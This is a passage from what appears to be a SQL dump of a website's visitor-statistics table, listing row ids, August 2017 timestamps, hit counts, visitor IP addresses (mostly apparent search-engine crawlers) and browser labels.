2.69','other'),(146998,1503104601,1,1,0,0,'217.182.132.183','other'),(146999,1503104626,1,0,1,0,'66.249.76.89',''),(147000,1503104764,5,5,0,0,'216.244.66.194','other'),(147001,1503105110,1,1,0,0,'178.154.200.7','other'),(147002,1503105113,1,1,0,0,'8.29.198.27','other'),(147003,1503105573,4,4,0,0,'216.244.66.246','other'),(147004,1503105624,1,1,0,0,'37.9.113.163','other'),(147005,1503106095,6,6,0,0,'216.244.66.194','other'),(147006,1503106461,1,1,0,0,'217.182.132.171','other'),(147007,1503107024,1,1,0,0,'217.182.132.66','other'),(147008,1503107202,1,1,0,0,'207.46.13.168','other'),(147009,1503107591,1,1,0,0,'51.255.65.40','other'),(147010,1503107658,1,1,0,0,'217.182.132.183','other'),(147011,1503108466,1,1,0,0,'51.255.65.9','other'),(147012,1503108553,1,1,0,0,'141.8.142.21','other'),(147013,1503108690,2,2,0,0,'40.77.167.27','other'),(147014,1503108702,1,1,0,0,'141.8.183.5','other'),(147015,1503109417,1,1,0,0,'51.255.71.100','other'),(147016,1503109705,1,1,0,0,'37.9.113.138','other'),(147017,1503109724,1,1,0,0,'213.180.203.32','other'),(147018,1503110261,1,1,0,0,'217.182.132.36','other'),(147019,1503110925,1,1,0,0,'95.108.181.63','other'),(147020,1503111002,1,0,1,0,'66.249.66.157',''),(147021,1503111023,1,1,0,0,'164.132.162.158','other'),(147022,1503111078,1,1,0,0,'91.209.11.236','other'),(147023,1503111333,1,1,0,0,'51.255.65.88','other'),(147024,1503111433,1,1,0,0,'216.244.66.194','other'),(147025,1503111443,1,1,0,0,'178.154.200.27','other'),(147026,1503111562,1,1,0,0,'95.108.181.69','other'),(147027,1503111776,1,1,0,0,'141.8.183.1','other'),(147028,1503112467,1,1,0,0,'217.182.132.94','other'),(147029,1503112484,3,3,0,0,'216.244.66.246','other'),(147030,1503112527,1,1,0,0,'5.45.207.64','other'),(147031,1503112881,1,1,0,0,'87.250.224.54','other'),(147032,1503112946,1,1,0,0,'51.255.65.7','other'),(147033,1503113250,1,1,0,0,'91.209.11.236','other'),(147034,1503113614,1,1,0,0,'216.244.66.246','other'),(147035,1503113823,1,1,0,0,'51.255.71.119','other'),(147036,1503113901,1,1,0,0,'217.182.132.149','other'),(147037,1503113929,1,1,0,0,'180.76.15.16','other'),(147038,1503114015,1,1,0,0,'217.182.132.146','other'),(147039,1503114307,1,1,0,0,'141.8.142.45','other'),(147040,1503114563,1,1,0,0,'5.45.207.32','other'),(147041,1503114717,1,1,0,0,'178.154.200.27','other'),(147042,1503114834,6,6,0,0,'216.244.66.194','other'),(147043,1503115009,1,1,0,0,'178.154.200.7','other'),(147044,1503115012,1,0,1,0,'68.180.228.221',''),(147045,1503115400,1,1,0,0,'137.74.207.119','other'),(147046,1503115587,1,1,0,0,'217.182.132.27','other'),(147047,1503115950,1,1,0,0,'8.29.198.27','other'),(147048,1503116152,1,1,0,0,'51.255.65.29','other'),(147049,1503116543,1,1,0,0,'51.255.65.97','other'),(147050,1503116743,7,7,0,0,'216.244.66.246','other'),(147051,1503116978,1,1,0,0,'51.255.71.119','other'),(147052,1503117276,1,1,0,0,'217.182.132.191','other'),(147053,1503117556,1,1,0,0,'95.108.181.63','other'),(147054,1503117678,1,1,0,0,'91.196.178.70','firefox'),(147055,1503117905,1,1,0,0,'51.255.65.24','other'),(147056,1503118261,1,1,0,0,'217.182.132.33','other'),(147057,1503118502,1,1,0,0,'51.255.71.112','other'),(147058,1503118513,1,1,0,0,'207.46.13.168','other'),(147059,1503119308,1,1,0,0,'51.255.65.96','other'),(147060,1503120220,1,1,0,0,'51.255.71.110','other'),(147061,1503120334,1,1,0,0,'51.255.65.68','other'),(147062,1503120484,1,1,0,0,'217.182.132.56','other'),(147063,1503120821,1,1,0,0,'40.77.167.9','other'),(147064,1503121587,1,1,0,0,'91.196.177.46','chrome'),(147065,1503121615,1,1,0,0,'217.182.132.190','other'),(147066,1503121765,1,1,0,0,'91.196.178.162','chrome'),(147067,1503121816,1,1,0,0,'51.255.65.24','other'),(147068,1503122224,1,1,0,0,'46.133.217.169','other'),(147069,1503122305,1,1,0,0,'66.249.93.205','chrome'),(147070,1503122623,1,1,0,0,'217.69.133.4','other'),(147071,1503122719,1,0,1,0,'68.180.228.221',''),(147072,1503122758,1,0,1,0,'66.249.66.155',''),(147073,1503123395,1,1,0,0,'51.255.65.8','other'),(147074,1503123788,1,1,0,0,'217.182.132.191','other'),(147075,1503123944,1,1,0,0,'51.255.65.81','other'),(147076,1503124112,1,0,1,0,'66.249.66.74',''),(147077,1503124215,5,5,0,0,'216.244.66.194','other'),(147078,1503124372,1,1,0,0,'95.132.60.115','chrome'),(147079,1503124416,1,1,0,0,'95.132.46.239','firefox'),(147080,1503124762,1,1,0,0,'217.182.132.7','other'),(147081,1503125609,1,1,0,0,'91.196.177.46','chrome'),(147082,1503125693,1,1,0,0,'51.255.65.30','other'),(147083,1503125738,1,1,0,0,'91.209.11.236','other'),(147084,1503126321,1,1,0,0,'217.182.132.84','other'),(147085,1503126566,1,1,0,0,'51.255.71.120','other'),(147086,1503126791,1,1,0,0,'8.29.198.26','other'),(147087,1503127130,2,2,0,0,'91.209.11.236','other'),(147088,1503127296,2,0,2,0,'66.249.76.93',''),(147089,1503127368,1,1,0,0,'51.255.65.50','other'),(147090,1503127701,1,1,0,0,'91.196.178.70','firefox'),(147091,1503128383,1,1,0,0,'217.182.132.17','other'),(147092,1503128421,1,1,0,0,'137.74.207.164','other'),(147093,1503128429,1,1,0,0,'91.209.11.236','other'),(147094,1503129589,1,1,0,0,'137.74.207.188','other'),(147095,1503130170,1,1,0,0,'176.98.70.171','chrome'),(147096,1503130977,1,1,0,0,'51.255.65.7','other'),(147097,1503131752,1,1,0,0,'51.255.65.79','other'),(147098,1503131989,1,1,0,0,'217.182.132.240','other'),(147099,1503132012,1,1,0,0,'40.77.167.9','other'),(147100,1503132455,1,1,0,0,'162.210.196.100','other'),(147101,1503132933,1,1,0,0,'217.182.132.54','other'),(147102,1503133058,1,1,0,0,'51.255.71.113','other'),(147103,1503133234,1,1,0,0,'91.209.11.236','other'),(147104,1503133249,1,1,0,0,'137.74.201.99','other'),(147105,1503133306,1,1,0,0,'91.196.177.46','chrome'),(147106,1503133498,1,1,0,0,'40.77.167.9','other'),(147107,1503133819,3,3,0,0,'216.244.66.194','other'),(147108,1503134120,1,1,0,0,'51.255.71.110','other'),(147109,1503135021,1,1,0,0,'51.255.65.56','other'),(147110,1503135102,1,1,0,0,'91.209.11.236','other'),(147111,1503135732,1,1,0,0,'91.196.178.162','chrome'),(147112,1503136247,1,1,0,0,'183.87.114.130','firefox'),(147113,1503136524,1,1,0,0,'217.182.132.27','other'),(147114,1503136645,1,1,0,0,'91.196.177.46','firefox'),(147115,1503136875,1,1,0,0,'51.255.65.49','other'),(147116,1503136893,1,1,0,0,'217.182.132.91','other'),(147117,1503137086,5,5,0,0,'216.244.66.246','other'),(147118,1503137093,1,1,0,0,'51.255.65.76','other'),(147119,1503137094,1,0,1,0,'68.180.228.221',''),(147120,1503137157,1,1,0,0,'51.255.65.10','other'),(147121,1503137206,1,1,0,0,'91.209.11.236','other'),(147122,1503137369,1,1,0,0,'217.182.132.180','other'),(147123,1503137627,1,1,0,0,'8.29.198.25','other'),(147124,1503137896,1,1,0,0,'176.15.227.85','msie'),(147125,1503137996,1,1,0,0,'217.182.132.17','other'),(147126,1503138057,1,1,0,0,'51.255.65.55','other'),(147127,1503138659,1,1,0,0,'171.25.175.235','chrome'),(147128,1503139565,1,1,0,0,'195.46.32.225','chrome'),(147129,1503139631,1,1,0,0,'40.77.167.29','other'),(147130,1503141114,1,0,1,0,'66.249.66.156',''),(147131,1503141144,1,1,0,0,'5.228.75.63','msie'),(147132,1503141145,1,1,0,0,'188.32.176.243','msie'),(147133,1503141168,1,1,0,0,'217.182.132.22','other'),(147134,1503141437,1,1,0,0,'217.182.132.182','other'),(147135,1503141576,1,1,0,0,'91.209.11.236','other'),(147136,1503141709,1,1,0,0,'217.182.132.23','other'),(147137,1503141865,1,1,0,0,'51.255.71.110','other'),(147138,1503142097,1,1,0,0,'217.182.132.77','other'),(147139,1503142543,1,1,0,0,'51.255.65.33','other'),(147140,1503142954,2,2,0,0,'37.9.113.94','other'),(147141,1503143105,3,3,0,0,'216.244.66.246','other'),(147142,1503143181,1,1,0,0,'51.255.65.62','other'),(147143,1503143344,1,1,0,0,'217.182.132.240','other'),(147144,1503143469,1,1,0,0,'51.255.71.110','other'),(147145,1503143829,1,0,1,0,'66.249.66.155',''),(147146,1503143835,1,1,0,0,'51.255.65.7','other'),(147147,1503144234,1,0,1,0,'66.249.66.75',''),(147148,1503144498,1,1,0,0,'217.69.133.4','other'),(147149,1503144541,1,0,1,0,'66.249.76.108',''),(147150,1503144762,1,1,0,0,'82.207.49.106','other'),(147151,1503144901,1,1,0,0,'217.182.132.73','other'),(147152,1503144960,1,1,0,0,'51.255.65.37','other'),(147153,1503145709,1,1,0,0,'217.182.132.80','other'),(147154,1503145770,1,1,0,0,'217.182.132.93','other'),(147155,1503146064,1,0,1,0,'66.249.66.156',''),(147156,1503146106,2,2,0,0,'213.180.203.32','other'),(147157,1503146209,1,1,0,0,'216.244.66.246','other'),(147158,1503146510,1,1,0,0,'137.74.207.116','other'),(147159,1503146741,1,0,1,0,'68.180.228.221',''),(147160,1503146873,1,1,0,0,'5.45.207.32','other'),(147161,1503147331,1,1,0,0,'51.255.65.47','other'),(147162,1503147543,1,1,0,0,'40.77.167.9','other'),(147163,1503147689,1,1,0,0,'199.58.86.209','other'),(147164,1503148056,1,0,1,0,'66.249.66.75',''),(147165,1503148135,1,1,0,0,'51.255.71.110','other'),(147166,1503148266,5,5,0,0,'46.229.168.73','other'),(147167,1503148296,4,4,0,0,'46.229.168.79','other'),(147168,1503148302,5,5,0,0,'46.229.168.80','other'),(147169,1503148321,5,5,0,0,'46.229.168.72','other'),(147170,1503148356,9,9,0,0,'46.229.168.76','other'),(147171,1503148375,3,3,0,0,'46.229.168.67','other'),(147172,1503148401,3,3,0,0,'46.229.168.68','other'),(147173,1503148430,2,2,0,0,'46.229.168.66','other'),(147174,1503148459,1,1,0,0,'8.29.198.27','other'),(147175,1503148461,4,4,0,0,'46.229.168.78','other'),(147176,1503148465,2,2,0,0,'46.229.168.74','other'),(147177,1503148520,1,1,0,0,'51.255.65.46','other'),(147178,1503148584,4,4,0,0,'46.229.168.75','other'),(147179,1503148591,4,4,0,0,'46.229.168.70','other'),(147180,1503148666,3,3,0,0,'46.229.168.77','other'),(147181,1503148683,4,4,0,0,'46.229.168.69','other'),(147182,1503148828,4,4,0,0,'46.229.168.65','other'),(147183,1503148829,1,0,1,0,'68.180.228.221',''),(147184,1503148900,4,4,0,0,'46.229.168.71','other'),(147185,1503148991,1,1,0,0,'95.158.3.62','chrome'),(147186,1503149207,5,5,0,0,'46.229.168.79','other'),(147187,1503149227,3,3,0,0,'46.229.168.80','other'),(147188,1503149324,4,4,0,0,'46.229.168.68','other'),(147189,1503149355,4,4,0,0,'46.229.168.76','other'),(147190,1503149381,5,5,0,0,'46.229.168.74','other'),(147191,1503149419,3,3,0,0,'46.229.168.67','other'),(147192,1503149438,12,12,0,0,'46.229.168.78','other'),(147193,1503149499,6,6,0,0,'46.229.168.72','other'),(147194,1503149585,2,2,0,0,'46.229.168.77','other'),(147195,1503149704,4,4,0,0,'46.229.168.66','other'),(147196,1503149882,5,5,0,0,'46.229.168.75','other'),(147197,1503149930,1,1,0,0,'164.132.162.156','other'),(147198,1503149937,2,2,0,0,'46.229.168.73','other'),(147199,1503149993,2,2,0,0,'46.229.168.71','other'),(147200,1503150006,2,2,0,0,'46.229.168.70','other'),(147201,1503150011,1,1,0,0,'46.229.168.65','other'),(147202,1503150029,3,3,0,0,'46.229.168.69','other'),(147203,1503150330,1,1,0,0,'46.229.168.80','other'),(147204,1503150338,1,1,0,0,'217.182.132.185','other'),(147205,1503150345,1,1,0,0,'37.73.248.149','chrome'),(147206,1503150622,1,1,0,0,'217.182.132.150','other'),(147207,1503151416,1,1,0,0,'51.255.65.56','other'),(147208,1503151445,1,1,0,0,'51.255.65.59','other'),(147209,1503151607,1,1,0,0,'137.74.207.102','other'),(147210,1503151648,1,1,0,0,'141.8.142.45','other'),(147211,1503152449,1,1,0,0,'51.255.71.117','other'),(147212,1503152566,4,4,0,0,'216.244.66.246','other'),(147213,1503152742,1,1,0,0,'217.182.132.78','other'),(147214,1503152990,1,0,1,0,'66.249.76.89',''),(147215,1503153028,1,1,0,0,'217.182.132.178','other'),(147216,1503153053,10,10,0,0,'216.244.66.194','other'),(147217,1503153988,1,1,0,0,'95.108.181.69','other'),(147218,1503154288,1,1,0,0,'87.250.224.75','other'),(147219,1503154478,1,1,0,0,'217.182.132.92','other'),(147220,1503154485,1,1,0,0,'37.9.113.180','other'),(147221,1503154488,1,1,0,0,'141.8.183.1','other'),(147222,1503154518,1,1,0,0,'40.77.167.9','other'),(147223,1503154564,1,1,0,0,'37.9.113.78','other'),(147224,1503154690,1,1,0,0,'176.31.231.10','other'),(147225,1503155037,1,1,0,0,'217.182.132.156','other'),(147226,1503155323,1,1,0,0,'217.69.133.5','other'),(147227,1503155794,1,1,0,0,'5.45.207.26','other'),(147228,1503155884,1,1,0,0,'217.182.132.57','other'),(147229,1503155933,1,1,0,0,'91.237.107.22','chrome'),(147230,1503156038,1,1,0,0,'5.45.207.32','other'),(147231,1503156116,1,0,1,0,'66.249.76.109',''),(147232,1503156214,4,4,0,0,'216.244.66.246','other'),(147233,1503156451,1,1,0,0,'51.255.71.132','other'),(147234,1503156996,1,1,0,0,'137.74.207.108','other'),(147235,1503157293,1,1,0,0,'51.255.65.45','other'),(147236,1503158343,1,1,0,0,'217.182.132.149','other'),(147237,1503158385,1,1,0,0,'51.255.71.112','other'),(147238,1503158684,1,1,0,0,'5.254.97.102','chrome'),(147239,1503158712,1,1,0,0,'91.196.178.165','chrome'),(147240,1503158764,1,1,0,0,'66.249.76.107','chrome'),(147241,1503159040,75,75,0,0,'5.9.79.151','other'),(147242,1503159058,1,1,0,0,'40.77.167.9','other'),(147243,1503159272,1,1,0,0,'51.255.71.126','other'),(147244,1503159296,1,1,0,0,'8.29.198.27','other'),(147245,1503159351,1,1,0,0,'216.244.66.246','other'),(147246,1503159517,1,1,0,0,'51.255.65.19','other'),(147247,1503159823,1,1,0,0,'137.74.207.102','other'),(147248,1503160073,1,0,1,0,'66.249.66.155',''),(147249,1503160292,1,1,0,0,'217.182.132.59','other'),(147250,1503160553,1,1,0,0,'51.255.71.133','other'),(147251,1503160813,1,1,0,0,'217.69.133.4','other'),(147252,1503160955,1,1,0,0,'51.255.65.92','other'),(147253,1503161501,1,1,0,0,'51.255.65.74','other'),(147254,1503161730,1,1,0,0,'178.154.200.27','other'),(147255,1503161747,1,1,0,0,'109.63.197.72','msie'),(147256,1503161823,1,1,0,0,'51.255.65.50','other'),(147257,1503161986,1,0,1,0,'68.180.228.221',''),(147258,1503162012,1,1,0,0,'217.182.132.17','other'),(147259,1503162373,2,2,0,0,'216.244.66.194','other'),(147260,1503162676,1,1,0,0,'217.182.132.95','other'),(147261,1503162687,1,1,0,0,'51.255.71.111','other'),(147262,1503163184,1,1,0,0,'51.255.71.116','other'),(147263,1503163294,7,7,0,0,'216.244.66.246','other'),(147264,1503163314,2,2,0,0,'216.244.66.194','other'),(147265,1503163401,1,1,0,0,'164.132.164.180','other'),(147266,1503163726,1,1,0,0,'51.255.71.126','other'),(147267,1503163797,1,0,1,0,'68.180.228.221',''),(147268,1503164303,1,1,0,0,'216.244.66.246','other'),(147269,1503164880,1,1,0,0,'141.8.183.1','other'),(147270,1503164933,1,1,0,0,'217.182.132.76','other'),(147271,1503165521,1,1,0,0,'37.73.250.145','chrome'),(147272,1503165709,1,1,0,0,'217.182.132.154','other'),(147273,1503165789,1,1,0,0,'137.74.207.119','other'),(147274,1503165796,1,1,0,0,'40.77.167.9','other'),(147275,1503166191,1,1,0,0,'151.80.27.116','other'),(147276,1503166230,1,1,0,0,'217.69.133.203','other'),(147277,1503166258,1,1,0,0,'217.69.133.194','other'),(147278,1503166769,1,1,0,0,'51.255.65.51','other'),(147279,1503166784,1,1,0,0,'137.74.203.194','other'),(147280,1503166988,1,1,0,0,'217.182.132.240','other'),(147281,1503167143,1,1,0,0,'51.255.65.54','other'),(147282,1503167335,1,1,0,0,'51.255.65.97','other'),(147283,1503167414,1,1,0,0,'216.244.66.246','other'),(147284,1503167561,1,1,0,0,'217.182.132.54','other'),(147285,1503167707,1,1,0,0,'141.8.142.45','other'),(147286,1503168060,1,1,0,0,'51.255.65.68','other'),(147287,1503168974,1,1,0,0,'217.182.132.5','other'),(147288,1503169448,1,1,0,0,'37.73.243.175','chrome'),(147289,1503169636,1,1,0,0,'91.196.178.164','chrome'),(147290,1503169690,1,1,0,0,'216.244.66.194','other'),(147291,1503169710,1,1,0,0,'216.244.66.246','other'),(147292,1503169898,1,1,0,0,'5.45.207.42','other'),(147293,1503170131,1,1,0,0,'8.29.198.25','other'),(147294,1503170175,1,1,0,0,'91.209.11.236','other'),(147295,1503170335,1,1,0,0,'217.182.132.60','other'),(147296,1503170535,1,1,0,0,'51.255.71.112','other'),(147297,1503171062,1,1,0,0,'51.255.65.78','other'),(147298,1503171082,1,1,0,0,'217.182.132.82','other'),(147299,1503171139,1,1,0,0,'51.255.65.66','other'),(147300,1503171345,1,1,0,0,'91.209.11.236','other'),(147301,1503171441,1,1,0,0,'51.255.65.43','other'),(147302,1503171715,1,1,0,0,'217.69.133.194','other'),(147303,1503171857,1,1,0,0,'51.255.65.79','other'),(147304,1503171963,1,1,0,0,'217.182.132.17','other'),(147305,1503172151,2,2,0,0,'51.255.65.20','other'),(147306,1503172163,1,1,0,0,'51.255.65.51','other'),(147307,1503172418,2,2,0,0,'216.244.66.194','other'),(147308,1503172422,1,1,0,0,'95.108.181.69','other'),(147309,1503172647,1,1,0,0,'137.74.207.116','other'),(147310,1503173028,1,1,0,0,'107.167.108.28','other'),(147311,1503173061,1,1,0,0,'51.255.71.100','other'),(147312,1503173422,1,1,0,0,'51.255.65.27','other'),(147313,1503173437,4,4,0,0,'216.244.66.246','other'),(147314,1503173546,1,1,0,0,'51.255.65.40','other'),(147315,1503173685,1,1,0,0,'51.255.65.59','other'),(147316,1503173699,2,2,0,0,'216.244.66.194','other'),(147317,1503173742,1,0,1,0,'68.180.228.221',''),(147318,1503173845,1,1,0,0,'217.182.132.182','other'),(147319,1503173982,1,1,0,0,'217.182.132.58','other'),(147320,1503174520,1,1,0,0,'130.180.218.202','chrome'),(147321,1503174564,1,1,0,0,'216.244.66.246','other'),(147322,1503174586,1,1,0,0,'173.252.88.91','other'),(147323,1503175045,1,1,0,0,'51.255.65.12','other'),(147324,1503175322,1,0,1,0,'68.180.228.221',''),(147325,1503175630,1,0,1,0,'66.249.66.157',''),(147326,1503175715,1,1,0,0,'217.182.132.82','other'),(147327,1503175870,1,1,0,0,'217.182.132.78','other'),(147328,1503175944,1,1,0,0,'40.77.167.112','other'),(147329,1503176395,1,1,0,0,'51.255.65.57','other'),(147330,1503176408,1,1,0,0,'217.182.132.58','other'),(147331,1503176498,1,1,0,0,'217.182.132.80','other'),(147332,1503176576,1,1,0,0,'51.255.65.64','other'),(147333,1503176732,1,0,1,0,'68.180.228.221',''),(147334,1503176791,1,0,1,0,'66.249.66.76',''),(147335,1503177004,1,1,0,0,'91.209.11.236','other'),(147336,1503177029,4,4,0,0,'216.244.66.246','other'),(147337,1503177353,1,1,0,0,'164.132.162.157','other'),(147338,1503177515,1,1,0,0,'217.182.132.22','other'),(147339,1503177778,1,1,0,0,'51.255.65.79','other'),(147340,1503178030,1,1,0,0,'164.132.162.188','other'),(147341,1503178769,1,1,0,0,'141.8.142.21','other'),(147342,1503179679,1,1,0,0,'141.8.142.21','other'),(147343,1503179706,1,0,1,0,'68.180.228.221',''),(147344,1503179781,1,1,0,0,'51.255.71.129','other'),(147345,1503180056,1,1,0,0,'217.182.132.50','other'),(147346,1503180264,1,1,0,0,'91.209.11.236','other'),(147347,1503180276,1,1,0,0,'217.182.132.27','other'),(147348,1503180547,1,1,0,0,'37.9.113.94','other'),(147349,1503180580,1,1,0,0,'51.255.65.83','other'),(147350,1503180969,1,1,0,0,'8.29.198.27','other'),(147351,1503181306,1,1,0,0,'51.255.71.100','other'),(147352,1503181913,1,1,0,0,'40.77.167.27','other'),(147353,1503182213,1,1,0,0,'51.255.65.77','other'),(147354,1503182590,1,1,0,0,'217.69.133.5','other'),(147355,1503182637,1,1,0,0,'91.209.11.236','other'),(147356,1503183325,1,1,0,0,'51.255.71.128','other'),(147357,1503183340,1,1,0,0,'51.255.65.23','other'),(147358,1503183467,1,1,0,0,'137.74.207.108','other'),(147359,1503183650,5,5,0,0,'216.244.66.194','other'),(147360,1503183968,1,1,0,0,'51.255.65.13','other'),(147361,1503184071,2,2,0,0,'91.209.11.236','other'),(147362,1503184149,1,1,0,0,'217.182.132.92','other'),(147363,1503184165,1,1,0,0,'217.182.132.80','other'),(147364,1503184226,1,1,0,0,'137.74.203.194','other'),(147365,1503184671,4,4,0,0,'216.244.66.246','other'),(147366,1503185416,1,1,0,0,'164.132.162.187','other'),(147367,1503185577,1,1,0,0,'51.255.71.127','other'),(147368,1503185584,1,1,0,0,'141.8.142.45','other'),(147369,1503186140,1,1,0,0,'5.45.207.64','other'),(147370,1503186752,1,1,0,0,'51.255.65.23','other'),(147371,1503186776,1,1,0,0,'51.255.65.71','other'),(147372,1503186973,1,1,0,0,'37.9.113.163','other'),(147373,1503187490,1,1,0,0,'164.132.162.155','other'),(147374,1503187839,6,6,0,0,'216.244.66.246','other'),(147375,1503187856,1,1,0,0,'37.9.113.138','other'),(147376,1503187864,1,1,0,0,'95.108.181.63','other'),(147377,1503188020,1,1,0,0,'217.69.133.4','other'),(147378,1503188694,1,1,0,0,'51.255.65.73','other'),(147379,1503189700,1,1,0,0,'40.77.167.112','other'),(147380,1503190234,1,1,0,0,'164.132.162.160','other'),(147381,1503190437,1,1,0,0,'217.182.132.170','other'),(147382,1503190665,1,1,0,0,'180.76.15.32','other'),(147383,1503190698,1,1,0,0,'51.255.65.93','other'),(147384,1503190744,1,1,0,0,'217.182.132.188','other'),(147385,1503191419,1,1,0,0,'51.255.65.29','other'),(147386,1503191814,1,1,0,0,'8.29.198.26','other'),(147387,1503191842,4,4,0,0,'216.244.66.246','other'),(147388,1503191846,1,1,0,0,'40.77.167.27','other'),(147389,1503192011,1,1,0,0,'51.255.65.54','other'),(147390,1503192280,1,1,0,0,'51.255.65.72','other'),(147391,1503192476,10,10,0,0,'216.244.66.194','other'),(147392,1503192818,1,1,0,0,'217.182.132.70','other'),(147393,1503193186,1,1,0,0,'95.108.181.69','other'),(147394,1503193269,1,1,0,0,'51.255.71.114','other'),(147395,1503193411,1,1,0,0,'51.255.65.77','other'),(147396,1503193437,1,1,0,0,'51.255.65.29','other'),(147397,1503193462,1,0,1,0,'68.180.228.221',''),(147398,1503193469,1,1,0,0,'217.182.132.67','other'),(147399,1503193775,1,1,0,0,'37.115.205.72','chrome'),(147400,1503194036,1,1,0,0,'217.182.132.52','other'),(147401,1503194313,1,1,0,0,'51.255.71.98','other'),(147402,1503194347,1,1,0,0,'40.77.167.112','other'),(147403,1503194401,1,1,0,0,'51.255.65.68','other'),(147404,1503195184,1,1,0,0,'217.182.132.74','other'),(147406,1503195350,1,1,0,0,'217.182.132.186','other'),(147407,1503195766,1,1,0,0,'51.255.65.224','other'),(147408,1503196078,1,1,0,0,'176.31.231.10','other'),(147409,1503196315,1,1,0,0,'37.9.113.163','other'),(147410,1503196488,1,1,0,0,'164.132.162.153','other'),(147411,1503196654,1,1,0,0,'217.182.132.31','other'),(147412,1503198243,1,1,0,0,'51.255.65.23','other'),(147413,1503198264,1,1,0,0,'5.45.207.64','other'),(147414,1503199415,1,1,0,0,'66.249.66.153','chrome'),(147415,1503199929,1,1,0,0,'217.182.132.153','other'),(147416,1503200245,1,1,0,0,'178.255.215.94','other'),(147417,1503200301,1,1,0,0,'217.182.132.192','other'),(147418,1503200869,1,1,0,0,'95.108.181.63','other'),(147419,1503200938,1,1,0,0,'51.255.71.114','other'),(147420,1503200989,1,1,0,0,'141.8.142.45','other'),(147421,1503201078,1,1,0,0,'157.55.39.4','other'),(147422,1503201212,5,5,0,0,'216.244.66.194','other'),(147423,1503201513,1,1,0,0,'51.255.71.113','other'),(147424,1503201958,1,1,0,0,'51.255.65.3','other'),(147425,1503201995,1,1,0,0,'40.77.167.29','other'),(147426,1503202591,1,0,1,0,'68.180.228.221',''),(147427,1503202649,1,1,0,0,'8.29.198.25','other'),(147428,1503202857,3,3,0,0,'216.244.66.246','other'),(147429,1503202861,1,1,0,0,'51.255.65.2','other'),(147430,1503202888,1,1,0,0,'141.8.183.1','other'),(147431,1503203065,1,1,0,0,'217.182.132.70','other'),(147432,1503203358,1,1,0,0,'217.182.132.149','other'),(147433,1503204033,1,1,0,0,'217.182.132.240','other'),(147434,1503204096,1,1,0,0,'141.8.183.5','other'),(147435,1503204167,1,1,0,0,'216.244.66.194','other'),(147436,1503204402,1,1,0,0,'51.255.65.71','other'),(147437,1503204933,1,1,0,0,'51.255.65.45','other'),(147438,1503205040,1,1,0,0,'46.201.112.8','chrome'),(147439,1503206369,1,1,0,0,'178.154.200.27','other'),(147440,1503207319,3,3,0,0,'216.244.66.246','other'),(147441,1503207332,1,1,0,0,'141.8.183.5','other'),(147442,1503207344,1,1,0,0,'51.255.65.74','other'),(147443,1503208106,1,1,0,0,'91.209.11.236','other'),(147444,1503208122,1,1,0,0,'164.132.162.158','other'),(147445,1503209197,1,0,1,0,'66.249.66.156',''),(147446,1503209642,1,1,0,0,'51.255.65.71','other'),(147447,1503209805,1,1,0,0,'157.55.39.4','other'),(147448,1503209832,1,1,0,0,'217.182.132.96','other'),(147449,1503209879,1,1,0,0,'217.182.132.71','other'),(147450,1503210191,1,1,0,0,'51.255.65.52','other'),(147451,1503210222,3,3,0,0,'216.244.66.246','other'),(147452,1503210292,1,1,0,0,'217.182.132.77','other'),(147453,1503210514,1,1,0,0,'130.180.216.49','chrome'),(147454,1503210798,1,1,0,0,'91.209.11.236','other'),(147455,1503210975,1,1,0,0,'51.255.71.128','other'),(147456,1503211137,1,1,0,0,'5.45.207.32','other'),(147457,1503211244,1,1,0,0,'141.8.183.5','other'),(147458,1503211508,1,1,0,0,'95.108.181.69','other'),(147459,1503211992,1,1,0,0,'213.180.203.32','other'),(147460,1503212152,1,1,0,0,'5.45.207.56','other'),(147461,1503212231,1,1,0,0,'51.255.65.56','other'),(147462,1503212383,2,2,0,0,'141.8.142.45','other'),(147463,1503213049,1,1,0,0,'51.255.65.24','other'),(147464,1503213290,1,1,0,0,'137.74.203.194','other'),(147465,1503213492,1,1,0,0,'8.29.198.27','other'),(147466,1503213893,1,1,0,0,'217.182.132.73','other'),(147467,1503213943,1,1,0,0,'5.45.207.32','other'),(147468,1503214167,1,0,1,0,'66.249.66.157',''),(147469,1503214629,1,1,0,0,'91.196.178.134','chrome'),(147470,1503214643,3,3,0,0,'216.244.66.246','other'),(147471,1503214872,1,1,0,0,'51.255.71.125','other'),(147472,1503215129,1,1,0,0,'178.255.215.94','other'),(147473,1503215212,1,1,0,0,'151.80.27.116','other'),(147474,1503215224,1,1,0,0,'217.182.132.81','other'),(147475,1503215259,1,1,0,0,'51.255.65.96','other'),(147476,1503215437,1,0,1,0,'66.249.66.76',''),(147477,1503215646,1,1,0,0,'91.209.11.236','other'),(147478,1503215667,1,1,0,0,'217.182.132.23','other'),(147479,1503215669,1,1,0,0,'217.182.132.65','other'),(147480,1503215755,21,21,0,0,'5.189.167.24','other'),(147481,1503215880,1,1,0,0,'213.180.203.32','other'),(147482,1503216143,2,2,0,0,'199.58.86.206','other'),(147483,1503216260,1,1,0,0,'95.108.181.63','other'),(147484,1503216986,1,1,0,0,'141.8.183.5','other'),(147485,1503217039,1,1,0,0,'217.182.132.185','other'),(147486,1503217123,1,1,0,0,'95.108.181.69','other'),(147487,1503217216,1,0,1,0,'66.249.66.74',''),(147488,1503217434,1,1,0,0,'217.182.132.191','other'),(147489,1503217827,2,2,0,0,'91.209.11.236','other'),(147490,1503218082,1,1,0,0,'217.182.132.154','other'),(147491,1503218484,1,1,0,0,'217.182.132.74','other'),(147492,1503218801,1,1,0,0,'216.244.66.194','other'),(147493,1503218848,1,1,0,0,'40.77.167.29','other'),(147494,1503219232,1,1,0,0,'157.55.39.4','other'),(147495,1503219237,1,1,0,0,'164.132.164.180','other'),(147496,1503219247,2,2,0,0,'141.8.142.45','other'),(147497,1503219771,1,1,0,0,'217.182.132.5','other'),(147498,1503219834,1,1,0,0,'141.8.183.5','other'),(147499,1503219889,1,1,0,0,'216.244.66.246','other'),(147500,1503219925,1,1,0,0,'5.45.207.32','other'),(147501,1503220060,1,1,0,0,'217.182.132.57','other'),(147502,1503220293,2,0,2,0,'68.180.228.221',''),(147503,1503220878,1,1,0,0,'51.255.65.76','other'),(147504,1503220994,1,1,0,0,'5.45.207.56','other'),(147505,1503221145,1,1,0,0,'141.8.183.5','other'),(147506,1503221168,1,1,0,0,'217.182.132.185','other'),(147507,1503221490,8,8,0,0,'216.244.66.194','other'),(147508,1503221555,1,1,0,0,'51.255.71.110','other'),(147509,1503222649,7,7,0,0,'216.244.66.194','other'),(147510,1503223032,1,1,0,0,'164.132.162.158','other'),(147511,1503223145,3,3,0,0,'216.244.66.246','other'),(147512,1503223224,1,1,0,0,'180.76.15.10','other'),(147513,1503223390,1,1,0,0,'5.45.207.64','other'),(147514,1503223402,1,1,0,0,'91.209.11.236','other'